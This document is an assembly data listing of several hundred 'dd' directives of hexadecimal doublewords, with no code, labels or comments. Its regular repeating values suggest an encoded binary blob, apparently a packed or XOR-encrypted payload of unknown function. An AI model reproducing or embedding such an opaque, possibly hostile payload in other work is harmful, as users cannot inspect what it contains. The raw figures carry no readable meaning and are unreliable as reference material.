dd 0E02EC56Bh, 108F54CEh, 8513CE65h, 0FA954E3h, 940EA06Eh
dd 14AF52D0h, 0B634C365h, 15B452E9h, 850DCC61h, 19B24FEDh
dd 0B134EE00h, 19B245F5h, 8F26CE49h, 14A14DF2h, 0B42ECF69h
dd 0EA54BEFh, 0B734EE00h, 5B449F2h, 9432C956h, 2DAC41F5h
dd 922FCD65h, 149220F9h, 892EF56Ch, 5A44FE3h, 8932D453h
dd 0F9447EEh, 8933CE41h, 9B254D3h, 0B740C76Eh, 149361D3h
dd 9534D261h, 0CA320F0h, 9325D36Fh, 5AB43EFh, 8F23A074h
dd 3A54EEEh, 8527A074h, 13AF48F4h, 8E39C274h, 60A54DE1h
dd 9623C572h, 0EA55380h, 8F33A064h, 14A54BE3h, 942EE900h
dd 5AE52E5h, 8F2CE374h, 18845F3h, 852CC46Eh, 14AE6980h
dd 852ED265h, 14A567F4h, 8E2ECF43h, 5B443E5h, 8134F364h
dd 29C045F4h, 9225D46Eh, 2FB445EEh, 0A12EC570h, 14AE6980h
dd 852ED265h, 5B06FF4h, 8C32F56Eh, 0E8920C1h, 8E32C574h
dd 59254E5h, 8906C461h, 21C045ECh, 0B001F644h, 4EF213C9h
dd 0E00CEC44h, 23A745D2h, 8533CF6Ch, 60B945CBh, 0AF27C552h
dd 2BAE45F0h, 9805D965h, 59220C1h, 8535F167h, 19659F2h
dd 0A525D56Ch, 32C061F8h, 8513C765h, 0CA176F4h, 9805C575h
dd 539620C1h, 0B642CAF6h, 0A14ABD6h, 92BFF201h, 0F53F7698h
dd 0E0769F70h, 3696E40Bh, 1F16F056h, 0F53F38F0h, 0E0769BDEh
dd 3ED0E403h, 6D40A8C2h, 0A8EBDBC9h, 0E040C851h, 2C4DC880h
dd 0E02AA324h, 309125EAh, 6B45CA53h, 0B44B704Ch, 0A02AF450h
dd 9F9372D1h, 0D67CA695h, 6C04A380h, 0DC4E35FFh, 0A44320B6h
dd 75CD6308h, 60F61B94h, 0E02A6933h, 60F048D2h, 24CBA032h
dd 20AA71D1h, 0F82AF150h
dd 34C8E003h, 1F10AE6Ah, 56FC2215h, 0C0842300h, 0A045F2B3h
dd 1782390Fh, 0A2E3785Ah, 1F73F7C3h, 9F3FE168h, 45C4AFFFh
dd 30C02080h, 0E030A968h, 0A14AB80h, 8A8C2B00h, 60C048C0h
dd 0E22AA010h, 8C04AD2h, 0E040D009h, 339120EAh, 16D55F50h
dd 3FC016BBh, 0A6D55F59h, 0E5C016BBh, 6B31D4FFh, 56D55C0Dh
dd 6D4C4300h, 56D02015h, 0B791A300h, 0EB12DFD3h, 0D67B4285h
dd 9B4FAD80h, 840A027h, 9F3FDFABh, 0DBBA258Bh, 0EF4D20B6h
dd 0E0408848h, 9F3F3A68h, 6C52BFFh, 0EDC016BBh, 0E068EF8Fh
dd 9FC9C880h, 65CB5FFFh, 60F61B6Ah, 0C0346085h, 489CAF0Dh
dd 14A8A000h, 0EB3FDF7Eh, 0D67B5285h, 1400A580h, 89CF2D0Bh
dd 88C020A8h, 1FBF5EDFh, 0A39FE70Bh, 0E0404855h, 0E19D2080h
dd 0D65BB0EDh, 0ED091380h, 0D65E3D85h, 31947180h, 0B111F051h
dd 5BB2B57Fh, 0E4C7A036h, 2655DFA4h, 0BD40963Bh, 35C02442h
dd 0E040A0E8h, 8D417D80h, 0E076BB3Fh, 0F54DDFEAh, 0E076BB0Ah
dd 400D72D0h, 0E06AA024h, 6CCE403h, 0FB1025C7h, 400D20B6h
dd 0FB1225C7h, 60E420B6h, 231DA02Ah, 88983AEAh, 0E040A009h
dd 0CAA1620Dh, 103569FEh, 554943h, 0E540963Ch, 22C82804h
dd 0DC203589h, 823720B6h, 0E0A8F5C3h, 3DC02080h, 0FBD94D81h
dd 0FD4B20B6h, 0E0769C64h, 68E45C03h, 59C4AF00h, 0E1C02080h
dd 0E042A8ECh, 64A87480h, 1F40A001h, 56FBBA15h, 6DBC2B00h
dd 61C40404h, 8A10A000h, 60C4C880h, 0B216A000h, 9F9720D2h
dd 0D67B3695h, 0ED091380h, 0E041A497h, 0A917180h, 0E12AF102h
dd 60C020E8h, 75BFF240h, 60F61BE2h, 94B62596h, 89470DBh
dd 0E040A104h, 4474DFD7h, 0E040A220h, 5C82B57Fh, 6519A036h
dd 83D65440h, 34CBF014h, 319220EAh, 75BFF657h, 60F61B5Ah
dd 95802559h, 0F53F7650h, 0E0769B46h, 3284770Dh, 0B804CA57h
dd 61C4B70Dh, 0D3EBA000h, 39D04A40h, 0B0100BF3h, 309070D0h
dd 75BFF250h, 60F61BEAh, 0E2486481h, 143F2080h, 75BFA824h
dd 60F61CB2h, 0D2D55F53h, 3DC016BCh, 6040A4C2h, 61B52ABEh
dd 98CD2B46h, 83C01695h, 0E0D52D19h, 63C01690h, 32BFF6D1h
dd 0E8CFE004h, 0E040A11Fh, 61D0A48Fh, 0DEC0A000h, 26D055BAh
dd 0EF409E80h, 60C12104h, 0C07E2000h, 0E186D1F5h, 0AE09F03Eh
dd 0EB8255C7h, 0E10666CFh, 310E0BCFh, 0B611A06Ah, 4A55DFD3h
dd 0B940963Ch, 0E5CFE1BBh, 0E040A0DFh, 7E51A50Dh, 0E02AA036h
dd 60C02CE8h, 1F13F000h, 56FC0A15h, 0E04C9D00h, 0E5CF2080h
dd 0E040A0BFh, 60C09169h, 0B07E2100h, 6F9669D2h, 0E0400585h
dd 6806A380h, 0EF4D9CACh, 60C0B904h, 95609C00h, 5AFC8C73h
dd 0E0CC250Fh, 6D6D2080h, 0C0608020h, 5A701BDh, 4C3FD574h
dd 1CB500BCh, 0C0BFDE81h, 15B454E8h, 0E33E2171h, 4FEF1AF0h
dd 0A786C875h, 51CF207Fh, 0E067B0BAh, 3222D780h, 0DB8A35FFh
dd 0A0F320B6h, 0B010F050h, 60C02968h, 972FE400h, 1AF4CEEh
dd 75BFA064h, 60F61CBAh, 0D6346085h, 0E549E9B3h, 0E0769C64h
dd 62C048D1h, 0B1112000h, 0F53F70D6h, 0E0769C3Eh, 7B53B50Dh
dd 0D310A036h, 30917449h, 1F11F152h, 56FB5215h, 0C4442700h
dd 5B86B57Fh, 23B8A036h, 75ABAD00h, 1941A036h, 0AC14A43h
dd 1F735F01h, 753F24F3h, 0A0481D80h, 14C120B6h, 9480255Eh
dd 0EB1B13DAh, 0E34B13D0h, 0D54D1CD0h, 0E076BDB7h, 61CC9A0Bh
dd 6ACBA000h, 60C02188h, 2B6B5803h, 930BABE0h, 0E534C1A6h
dd 8B35C2C7h, 0EF87232Eh, 370CABD3h, 0B410748Bh, 329160EAh
dd 75BF5F6Ah, 60F61C86h, 0DB3A2D8Bh, 0A44320B6h, 638F8B0Ch
dd 67072769h, 0E0A8A06Ah, 0A3C36F09h, 0B406EF53h, 259261D7h
dd 8329ED5Ch, 0FB34FF2h, 0B71CD466h, 0FA44EE9h, 0A31CD377h
dd 5B252F5h, 8516D46Eh, 0FA953F2h, 9805FC6Eh, 12AF4CF0h
dd 0B440D265h, 5A752E1h, 932FE874h, 60C220F4h, 9215F000h
dd 12A9F00Fh, 9A6EC463h, 4EA645E9h, 0AE40CC70h, 408B63C9h
dd 9330C96Dh, 0EA244F5h, 0A513F50Ah, 2AB400D2h, 0C00EE94Fh
dd 12A956A6h, 0B54AD574h, 60C02068h, 0DC1FD00h, 60F63E23h
dd 0F52B25C6h, 9FC020B6h, 0D67B3E95h, 7F28E180h, 0FE2A9C74h
dd 5B96950Bh, 4C19A036h, 4AB50EBCh, 1F7E2166h, 0EDE3559Dh
dd 0D67CFABDh, 62B6AB80h, 45260557h, 5711A50Dh, 65CFA036h
dd 60F61777h, 1A0629FAh, 9B3E6E0Ch, 2FA2A1B1h, 7F28416Bh
dd 63BF5FFBh, 64C804FCh, 6586F575h, 60F66088h, 0E0484800h
dd 26932080h, 0AC048E43h, 0F53F20CCh, 0E0769BAAh, 77B4E08Bh
dd 0B342CA93h, 5B92B57Fh, 20C5A036h, 0E53E28F4h, 0E076E008h
dd 8853F07Fh, 1FBF5E84h, 60C02B68h, 0A306F300h, 4E936FDFh
dd 0E00CEC44h, 5B6AB57Fh, 89A8A036h, 883FDF7Eh, 1FBF55EEh
dd 7211AD7Fh, 2973A036h, 20C4A50Dh, 0B111A036h, 319071D1h
dd 75BFF151h, 60F61B26h, 0E040ABE8h, 25937580h, 0CE729352h
dd 608C6CC4h, 0DBEA35FFh, 6A2820B6h, 9740A000h, 9B250F3h
dd 0A126D46Eh, 0F53F7080h, 0E0769B52h, 5B9AA509h, 0D14FA036h
dd 79B1AD0Dh, 65C9A036h, 60F61CE0h, 4AD55F51h, 0F3C016BBh
dd 0E040A468h, 1E75AD80h, 0B9409619h, 5C869D0Dh, 4FA8A036h
dd 63FDF75h, 0FE2A25C7h, 30C020B6h, 0FE2C0583h, 0EDC020B6h
dd 0D65E8A95h, 0A947080h, 0B240CA01h, 60C022E8h, 0AAD55F80h
dd 0E5C016BCh, 0C235FAC0h, 7E9DAD0Dh, 8A12A036h, 0A75AD86h
dd 0B440961Eh, 319070D6h, 0AED55F52h, 38C016BCh, 0DC0635FFh
dd 0E50620B6h, 0E0769E67h, 60CCC880h, 0B317A000h, 538B63CFh
dd 0AC048E32h, 0F53F20CCh, 0E0769BAAh, 60C74813h, 55CDA000h
dd 60F63855h, 0F6FD2D59h, 88C016BCh, 1FBF552Ah, 60C02C68h
dd 0AE09F700h, 34856EC9h, 0AC0CE42Eh, 0CA55DF80h, 6540963Bh
dd 55442F40h, 7340A002h, 60C025E8h, 0F3F52D00h, 39C01699h
dd 0DC721D8Dh, 932820B6h, 63BF5FF4h, 56FC163Dh, 644FA000h
dd 60C02290h, 0E1D04C81h, 8942080h, 0E040A101h, 5CD6B57Fh
dd 24C1A036h, 60C02110h, 8A942B50h, 0F53F7280h, 0E0769C36h
dd 1599E005h, 0F3C8C80Dh, 0F53F2080h, 0E0769BCAh, 0DD43C26Bh
dd 0E076BE6Ch, 0EDE95580h, 0D65ED085h, 0F53F7080h, 0E0769C22h
dd 0E4CFE005h, 0E040A189h, 0EBCC600Bh, 6F705F00h, 56DE4C05h
dd 87C56600h, 61C016BEh, 0E12AA06Ah, 0F53F22EAh, 0E0769C2Eh
dd 6F3FD803h, 0E041C084h, 0F54DB380h, 0E076BE68h, 339230EAh
dd 0DC5E35FFh, 0A04520B6h, 0E100250Fh, 0DD4D2080h, 0E076BE82h
dd 49282831h, 88BF5FFAh, 60C02014h, 69A68B5Eh, 9F9404B4h
dd 0D67B0295h, 0F07DAD80h, 5140961Eh, 9ACAC881h, 75CD5FFFh
dd 60F63EFDh, 0F428A06Ah, 32C02080h, 0CAD55F53h, 0EDC016BCh
dd 6D548444h, 56802415h, 564FF000h, 4484AB8Ah, 0E8A06114h
dd 72C16A82h, 0AA52A24Ah, 44842B83h, 0EFA12008h, 31C8C041h
dd 0F064E40Bh, 0ED90127Fh, 0D67CC8BDh, 60DCC880h, 0CE65A000h
dd 4EE058B6h, 0DA608E20h, 4EE505A5h, 9865D838h, 6AB305A0h
dd 0AE09EF4Ah, 9F9720A0h, 0D67BFA95h, 0CC04A180h, 8A40A000h
dd 33977080h, 0DC6A35FFh, 0ED4B20B6h, 0E076B584h, 7B2320EAh
dd 0B14D696Bh, 60C02568h, 84658600h, 9F97208Ah, 0D67BFA95h
dd 6C04A380h, 884B4B50h, 60C02087h, 0FED61D8Dh, 339720B6h
dd 0DC6A35FFh, 0A04520B6h, 55CDF47Eh, 60F61CE8h, 0F5C40583h
dd 0EDC020B6h, 0D67EC78Dh
dd 0A0E0B80h, 0B316F100h, 5CE6B57Fh, 18C3A036h, 0F1EF5E80h
dd 55CD5E8Bh, 60F61CE8h, 4EB2ADB0h, 88A030F5h, 1FBF5A17h
dd 83D752E1h, 0E1372D09h, 0AF4BCA6Bh, 5DCD6E2Bh, 60F61CE8h
dd 17C704F3h, 9F93996Bh, 0D67CBA95h, 0B7DA080h, 0E1409615h
dd 50A80AF4h, 1F40A075h, 56FBEA15h, 87FD2000h, 60C016BEh
dd 6587B174h, 60F63EECh, 0E040A000h, 5EA7A546h, 940A036h
dd 9F3FDE88h, 0F53425C7h, 60C020B6h, 221D2000h, 6ACD2084h
dd 8F2E804Fh, 0FE04EEFh, 892C8066h, 40E145E6h, 8934804Fh
dd 14E045EDh, 8523806Fh, 12A245ECh, 0C125D461h, 40E02A8Dh
dd 0AF608020h, 0DB553A0h, 0C032C56Dh, 4B241E7h, 0ED61CE65h
dd 0CA5728Ah, 8C34CE65h, 0CB353E5h, 81288079h, 40B950F0h
dd 0C024CE61h, 5B058E5h, 8E21D463h, 13E00CF4h, 842EC174h
dd 5AA74EE9h, 0EA4D8D20h, 3B441D7h, 872EC968h, 0CAC41A0h
dd 9921C420h, 4AE41A0h, 8729CE20h, 40EC54E8h, 0C032CF66h
dd 5A952E6h, 0C033C46Eh, 1B700C9h, 0ED7AD469h, 5A8778Ah
dd 8160C572h, 19E045F2h, 0C06CD56Fh, 5A952E6h, 0DF33C46Eh
dd 0DAF63A0h, 0A9608165h, 13A900F4h, 8D29D420h, 29E001E5h
dd 0C0338774h, 5B441ECh, 27C4A421h, 5B3DF0B0h, 0EB3A144Ah
dd 0B4BA2385h, 9F93964Fh, 0C2618826h, 4654894Ch, 9A1A0390h
dd 0D71292A5h, 0EBF8FC0h, 4B19F760h, 639688BAh, 8C8CFCA7h
dd 0FF0C2042h, 0C22470C8h, 3830039h, 0E040A01Eh, 60C02080h
dd 0E040A000h, 60C02080h, 0E040A000h, 60C02080h, 0E040A000h
dd 60C02080h, 0E040A000h, 60C02080h, 0E040A000h, 60C02080h
dd 0E040A000h, 60C02080h, 0E040A000h, 60C02080h, 45C3C000h
dd 60F61F54h, 38E52300h, 60C016BFh, 0F403170Fh, 6FD8730Dh
dd 0E346EBB7h, 4484AB50h, 0EC028B24h, 22FB39F2h, 6B54D308h
dd 22EB34C2h, 34D5290Ch, 0E9C016BFh, 0D67F7885h, 0E3C5CB80h
dd 39A288C2h, 60C4E2E1h, 0C4262588h, 42820B6h, 8840A000h
dd 60C020A0h, 0C3D3258Dh, 599920B6h, 634CD418h, 97222440h
dd 0DFF425FFh, 970320B6h, 86CDA3D9h, 83C016A4h, 1C305F10h
dd 8843200Fh, 69B64204h, 56E3B31Dh, 0E07A2300h, 52EB25F4h
dd 6D50D203h, 3B98DCCEh, 0E07A235Eh, 523F24F4h, 92BFA3EBh
dd 9F97C890h, 2E6B5FFFh, 5F18ADABh, 0E318A036h, 0EF0314CBh
dd 0D67F1885h, 0D445E780h, 0E040963Fh, 88C02080h, 0E040A03Ch
dd 5F74A50Bh, 76A8A036h, 883FDF76h, 0E040A018h, 5F749D03h
dd 9540A036h, 6F5DA988h, 0B409624h, 0D44DDF1Ch, 2340963Fh
dd 5F78A50Fh, 75C9A036h, 60F61F34h, 0E040A3E8h, 0A3091380h
dd 0E0C0338Bh, 88922080h, 1FBF5EEDh, 5F18B583h, 3643A036h
dd 60CC5A03h, 0E147240Fh, 1A432080h, 644FA010h, 60C0207Dh
dd 0B04CE28Bh, 9F3EE868h, 38C5A3FFh, 63C016BFh, 0E8CAF0C6h
dd 14C0D900h, 0CEB92019h, 8B8023F4h, 0E1082BF1h, 0BF1FC101h
dd 19C17FDFh, 608C6CC4h, 0CB194C75h, 9A39A348h, 0E0F72F0Fh
dd 0E1A62080h, 0D2735E78h, 606BA58Fh, 6316A000h, 65B520BAh
dd 0B50EA8Bh, 63CAAB82h, 92A8F1F1h, 633FDF7Eh, 0D67F78B5h
dd 0A0458D80h, 644F5B78h, 60C02004h, 0DF9815FFh, 889020B6h
dd 1FBF5E55h, 5F18A583h, 65CFA036h, 60F61F58h, 0B364A403h
dd 53C2E003h, 0E8F6AFDBh, 0A9403263h, 0C481F320h, 7CE924A4h
dd 0C44C8924h, 892B60DBh, 374F5B81h, 5EB4FD3Bh, 0A5E85B81h
dd 56B4FBEEh, 0DB195B81h, 4EB4DF21h, 0C2965B81h, 46B48C35h
dd 9D35B81h, 7EB4D3D8h, 93D5B81h, 76B4D3D8h, 0DF065B81h
dd 6EB4C1A5h, 0DF705B81h, 66B4C1A5h, 0DFF835FFh, 899B20B6h
dd 1FBF5F71h, 7402A3DEh, 1FBE4FE9h, 0AC3E37Fh, 0D6A8F804h
dd 0E83FDF75h, 0D666E095h, 51784680h, 20A2A218h, 82C22364h
dd 0E62A0B66h, 95DBC8D8h, 22C35FFFh, 0A11A788h, 0EEA8F805h
dd 0E03FDF75h, 0EB33A3FAh, 0E5C27030h, 0E0768640h, 0AE7CB2Ah
dd 60EAF868h, 78B5237Ah, 0EA8B1B0h, 0D83FDF74h, 0E040A001h
dd 6DB4F204h, 2ABE40D1h, 652BD66Bh, 0E040A0B8h, 0DF228B00h
dd 50D52DC3h, 4BC016B8h, 239A57D7h, 5865A577h, 0E040A036h
dd 0F5CF2880h, 0EBA061C0h, 5863A576h, 9541A036h, 0E9CD4686h
dd 16534B25h, 56F88305h, 0E635A200h, 45F12DE6h, 0ED26A4EBh
dd 0CBA60581h, 1FBF1CE8h, 5483AB7Fh, 0DF8C3589h, 0A36B20B6h
dd 0D8E525F7h, 60C020B6h, 754FA800h, 0CA7C2440h, 1FBF3CE8h
dd 0B055A97Fh, 1640963Fh, 56F88305h, 0E435A100h, 622B118Fh
dd 23EB602Bh, 5865A577h, 0E040A036h, 47B42880h, 0D8DF258Ah
dd 800120B6h, 6B4DC60Bh, 0D06B46C5h, 65CA0AF8h, 60F6181Fh
dd 0E55B40C1h, 664944E7h, 868093ABh, 0D8D2CB2Bh, 0E0452F64h
dd 0FF45AA2Bh, 0E4409638h, 7820E1D8h, 1CF063ABh, 0D8A6006Bh
dd 4B26A0EBh, 64AA396Bh, 13BF4858h, 644DDF7Fh, 0E8A061D2h
dd 0A04925E6h, 0E3AB0B66h, 0A6AB030h, 6A8F802h, 0E43FDF73h
dd 8A72D4D2h, 0BA287888h, 1EBF5FF3h, 1403524Ah, 948A5EC5h
dd 140ADE49h, 948A5EDBh, 140ADE8Ch, 948A5E0Ch, 8B39908Ch
dd 0BBD10CDh, 8B359049h, 0BB810C5h, 0DD4DE341h, 0E07698B0h
dd 5865A577h, 0E040A036h, 63B4A080h, 17EAC0B0h, 56F88505h
dd 0E040A000h, 0D8C75488h, 0E0AC2B55h, 0E5376F2Bh, 0E07698A5h
dd 61C02083h, 0E097240Fh, 88702080h, 5DC90BAAh, 60F61F3Ch
dd 4BEA48B0h, 5F009D09h, 65B7A036h, 60F61825h, 0E040A003h
dd 0E53735F4h, 0E07698A5h, 61C02080h, 21A8A574h, 0D03FDF7Eh
dd 6BEB0AE9h, 56FF9C05h, 0CB8F2B00h, 0A47DA948h, 6940963Fh
dd 778DCC8h, 4B765F64h, 0CBA6E0B3h, 0D8E525F7h, 60C320B6h
dd 0EE34A000h, 5863A576h, 94C0A036h, 9E82C885h, 87F85FFFh
dd 0CBE6A9E4h, 4B266033h, 5865A577h, 0E043A036h, 35B42080h
dd 0D8E325F6h, 154020B6h, 1E5E4805h, 0C428DF7Fh, 50BF5FFDh
dd 9B76C8A0h, 0D9A35FFFh, 753F98E6h, 4BD10B66h, 5865B50Bh
dd 32B7A036h, 60C3E277h, 0F435A000h, 9F3D5E68h, 85F10FFh
dd 9F3FDB10h, 0F5BF1866h, 0CB518BE6h, 65CB6F8Bh, 60F61F44h
dd 0A8C9682Bh, 0C545D77Ch, 0E3409638h, 14C02080h, 45C5572Eh
dd 60C016B8h, 9446A000h, 0C545D7A2h, 0E0409638h, 15C12080h
dd 1DB24805h, 0E537DF7Fh, 0E07698A5h, 64C02080h, 0EDA8A574h
dd 973FDF7Eh, 0D6780585h, 60C02480h, 857D400h, 9F3FDEE7h
dd 1E8089B8h, 68788B48h, 4B44D4C0h, 8B385538h, 65B70B67h
dd 60F61825h, 0E040A008h, 0DD406FF5h, 0E07698A3h, 88865480h
dd 1FBF5E3Bh, 49D80938h, 7FE5AAC9h, 0A0C016B8h, 454AA3E4h
dd 60F6181Fh, 4AF110ABh, 5863A50Ah, 50EAA036h, 0FF452AC0h
dd 4A409638h, 9D2298E6h, 0D8E525F7h, 60D020B6h, 0E734A000h
dd 66A6930h, 86BCD5B8h, 0CA28902Bh, 69EB6033h, 56FF883Dh
dd 45C55700h, 40C016B8h, 9540A000h, 6A989089h, 0D6783D85h
dd 0D8A68A80h, 65B76081h, 60F61825h, 0E040A040h, 0A44023F4h
dd 7DE5AA28h, 6C016B8h, 4CFD29ABh, 0CBC016BFh, 0D8E525F7h
dd 60C020B6h, 0E935E000h, 0E5C27030h, 0E076989Dh, 0C545D72Ah
dd 60409638h, 15C02080h, 0EAF8100Bh, 56F8BE05h, 0DDAB0A00h
dd 78F198E6h, 0D8E525F7h, 61C020B6h, 0E234A000h, 0C5CA0930h
dd 0E076989Eh, 6AC3C440h, 0D6783EA5h, 66B4680h, 17B021B8h
dd 56F88505h, 0E042A000h
dd 0D4C25580h, 7EE5AAC8h, 6C016B8h, 28FD29ABh, 0D8C016BFh
dd 0E04088B0h, 0C545D72Bh, 0E8409638h, 14C02080h, 1D714871h
dd 0E537DF7Fh, 0E07698A5h, 60C02480h, 58F0AB75h, 585FA58Ah
dd 0BEAA036h, 0C545D7CDh, 0E0409638h, 15C02088h, 63F8C611h
dd 0FF652A60h, 86409638h, 0CA00132Bh, 5826B5EBh, 0C5CA38A9h
dd 0E076989Fh, 6AC3C440h, 0D6783FA5h, 976B4680h, 0D6780585h
dd 60D02080h, 61F8C600h, 0E0C35440h, 454AA8C4h, 60F6181Fh
dd 564F0B66h, 56F88305h, 20A80B00h, 973FDF7Ch, 0D6780585h
dd 60C02080h, 5049D440h, 0FD4522D0h, 4A409638h, 5865A577h
dd 0C040A036h, 0E6702080h, 0E444A275h, 0EA3E6F0Dh, 0D6783DA5h
dd 0D04DA980h, 8640963Fh, 653CA02Bh, 0E0F0A775h, 203F6F00h
dd 1C3948AAh, 0E537DF7Fh, 0E07698A5h, 60C06080h, 0D1261866h
dd 497422F5h, 0F8F00B66h, 585FA58Ah, 80A036h, 34288A83h
dd 50BF5FFCh, 0C545D708h, 0E0409638h, 15C02000h, 6AC61002h
dd 56F8BD25h, 60EBC600h, 67B5257Ch, 0AFC0A0B0h, 886A607Fh
dd 1FBF5C2Bh, 5865A577h, 0E040A036h, 6BB52081h, 654AE0B0h
dd 60F6181Dh, 864F4BAAh, 6A00A338h, 0D6783DA5h, 0D06B4680h
dd 65B70A01h, 60F61825h, 0E042A000h, 0E5370FF5h, 0E07698A5h
dd 60C42080h, 20F0BA75h, 585FA58Ah, 45CAA036h, 60F61824h
dd 865040C1h, 0CB414638h, 0E8ABA0B0h, 0E5CA6030h, 0E076989Fh
dd 0C545D72Ah, 0E0409638h, 15C02880h, 63F8C610h, 0FE652A68h
dd 86409638h, 8BC1902Bh, 0EA081008h, 56F8BE05h, 65B70A00h
dd 60F61825h, 0E050A000h, 45B55531h, 18C31866h, 585E858Ah
dd 4B26A036h, 496AE0B3h, 0D67F10BDh, 0C545D780h, 0E0409638h
dd 15C00080h, 0B37111Fh, 6978469Bh, 7EE5AA18h, 0A0C016B8h
dd 454AA3E4h, 60F6181Eh, 5D690B66h, 60F61F30h, 45CA618Ah
dd 60F61F30h, 0B8F00B66h, 585DA582h, 17EAA036h, 56F88505h
dd 0E040A300h, 97E25481h, 0D6780585h, 60C02080h, 1756D504h
dd 56F88505h, 0E040A000h, 88C55583h, 1FBF5A84h, 9F3A8B68h
dd 45C557FFh, 60C016B8h, 9448A000h, 0CA099083h, 0D8E525F7h
dd 60C020B6h, 0C0342000h, 0E5EA2730h, 0E076989Dh, 6DDAC041h
dd 0E064A889h, 585D8582h, 480A036h, 6404A083h, 4A2110ABh
dd 803F98E6h, 0D8DD050Ah, 0CBA620B6h, 0D8E525F7h, 60E020B6h
dd 0B334A000h, 5865A577h, 0E040A036h, 6DB40080h, 0E04367F7h
dd 65B42080h, 0BEA30B0h, 0EB07AB73h, 0D67F088Dh, 0E9010B80h
dd 0B8F05C41h, 585DA58Ah, 17EAA036h, 56F88505h, 0A040A000h
dd 6CC5480h, 0EA83F0B8h, 56F8BD05h, 864A4B00h, 6A20DF38h
dd 0D6783DA5h, 976B4680h, 0D6780585h, 60C02380h, 1733D401h
dd 56F88505h, 0E040A000h, 97CD54A0h, 0E040A3C7h, 0D0C55480h
dd 13AB0A90h, 0E54BEF0Bh, 0E0769FC0h, 2849E8ABh, 178993FCh
dd 56F88505h, 6040A000h, 0EDCE5580h, 0D6783D85h, 20C8AA80h
dd 93435980h, 0ADC4AD78h, 0E0508444h, 0D0C8C041h, 0E6A30B8Bh
dd 0A0F198E6h, 58260B66h, 0D8A8A00Fh, 0E240A000h, 386B4661h
dd 958925ABh, 51784686h, 50EBC6C0h, 0E54D8A43h, 0E07698B0h
dd 5865A577h, 0E040A036h, 66B53080h, 0B8B88B57h, 334B396Bh
dd 0CBB88B28h, 0A84DAB50h, 0E140963Fh, 56FF8815h, 6B79A100h
dd 0E9C404C4h, 0D650C7BDh, 0CC7DAB80h, 0CB40963Fh, 56FF8805h
dd 45C55700h, 20C016B8h, 9440A000h, 0CB18D782h, 0B640A4C2h
dd 807DA3D7h, 0E040963Fh, 6119A48Fh, 0EDA8A000h, 2BC02080h
dd 0A50EF245h, 4EF213CCh, 0E00CEC44h, 5B52B57Fh, 65C9A036h
dd 60F61F74h, 0DC182B53h, 133FF883h, 0D4032B28h, 9F35C068h
dd 34D52BFFh, 3BC016BFh, 694CE203h, 56FFD805h, 0E802A300h
dd 5F3CA509h, 93CBA036h, 0E073DFA8h, 840A000h, 9F3FD539h
dd 0DF941D8Bh, 889620B6h, 1FBF55ADh, 5F14B50Bh, 0AACBA036h
dd 6C8A2388h, 9C36E2Bh, 482F85h, 0EF40A001h, 60C17A04h
dd 38F5A300h, 63C016BFh, 0D67F38B5h, 88FC8C80h, 0E0E2250Fh
dd 264D2080h, 78C58B04h, 63C016BFh, 8AA8F006h, 0E33FDF75h
dd 0D67F74BDh, 6BB52080h, 0EF4CE73Bh, 60C13B03h, 0D94C4B00h
dd 56FFF415h, 0EDC5AF00h, 63C02081h, 0D67F3885h, 58414680h
dd 654F85FFh, 60C0207Ch, 0CB42E08Bh, 889014C3h, 1FBF552Dh
dd 5F149DB9h, 654FA036h, 60C02064h, 0DF982503h, 0E5C320B6h
dd 0E0769F98h, 27EB200Bh, 2DC2AF0Ch, 5BC02080h, 634FA847h
dd 60C02044h, 0E3426083h, 0E5C334C7h, 0E0769F98h, 0D53F70D2h
dd 0E0769FF4h, 5B92B57Fh, 651AA036h, 0D7452F40h, 940A000h
dd 60C0201Ch, 654F5F3Ch, 60C02014h, 0EF559E80h, 60C0AB05h
dd 0E1062B00h, 30F463ABh, 1FB41CE8h, 0B47D197Fh, 9540963Fh
dd 0B84523F7h, 0E340963Fh, 56FFB805h, 0E0C52900h, 0EBC016C0h
dd 18C59B00h, 12C016BFh, 1CC59B08h, 12C016BFh, 0E0409D69h
dd 57B25080h, 0E040BFE8h, 9C8EAD80h, 0E26B618Bh, 5BD06283h
dd 0D600A085h, 0E3CC5580h, 0D1BFB0C4h, 7CE4640Fh, 235B4B61h
dd 5F78A50Fh, 6B20A036h, 56FFB835h, 151A4800h, 0C9A1DF7Fh
dd 6040A000h, 27EB2EF5h, 0DB49D20Ch, 0E2CF28C7h, 1FBF5F3Ch
dd 0D2452FC9h, 6BBF5FFEh, 0C74104BCh, 0E04088A5h, 1F3FDF7Fh
dd 0AAC1E2EBh, 60C040A4h, 2073EEE0h, 0E7E42C0Bh, 0D67F4085h
dd 0BC45A980h, 6D40963Fh, 60E88939h, 78C5A300h, 6C016BFh
dd 0CB0E05A5h, 74822346h, 264CE22Bh, 0A728DBC6h, 0E040F281h
dd 60C02580h, 1C062900h, 37037EDFh, 0DBDE35FFh, 880120B6h
dd 0FAC5AF1Fh, 30C02081h, 8A68CA54h, 9E55DF7Fh, 6540963Bh
dd 0E8CF7F40h, 0E040A105h, 9F256068h, 0E05148FFh, 5932080h
dd 8C29E674h, 3A573E5h, 9429D275h, 9FC061F9h, 0D67FCCB5h
dd 3255DF80h, 6940963Bh, 56FF5405h, 0E0594800h, 5932080h
dd 852BC154h, 5AE57CFh, 8928D372h, 9B270F0h, 852CC976h
dd 37C045E7h, 1FA9B1E8h, 60D3C87Fh, 8513A000h, 14B345D2h
dd 0B025D26Fh, 9B649F2h, 8527C56Ch, 93287780h, 8BF5FE8h
dd 60C02092h, 8102C553h, 10B54BE3h, 9629D250h, 7A54CE9h
dd 817A065h, 9F3FC856h, 0E040B8E8h, 23A57380h, 872EC168h
dd 14AF6EE5h, 0B039C669h, 9B649F2h, 8527C56Ch, 0D3287780h
dd 0B0BF5FE8h, 0D045ADD4h, 8A40963Ah, 61AA70E4h, 0EAD55F57h
dd 0E9C016BCh, 75BF843Ch, 60F61BC6h, 5DCD602Ah, 60F61EE8h
dd 1F10F050h, 56FA9035h, 0E041C800h, 0A942084h, 75BFF701h
dd 60F61FF4h, 0B744CA54h, 5FB4B57Fh, 24C3A036h, 0C75DF94h
dd 1F40963Fh, 56FBA215h, 6D83FF00h, 56FE4835h, 75BFF600h
dd 60F61B06h, 0EFBF5883h, 60C09B04h, 98C52900h, 0AC016BFh
dd 75BFF600h, 60F61B42h, 644F6085h, 60C02024h, 0B010602Bh
dd 0A9023EAh, 0E040C801h, 9F96E080h, 0D67BC295h, 9F38A380h
dd 0E5A8240Fh, 0E5492080h, 0E0769F7Ch, 5F40AD0Dh, 75CDA036h
dd 60F61F08h, 0E02AF251h, 0EE55DFD0h, 6340963Bh, 0E4CFDF78h
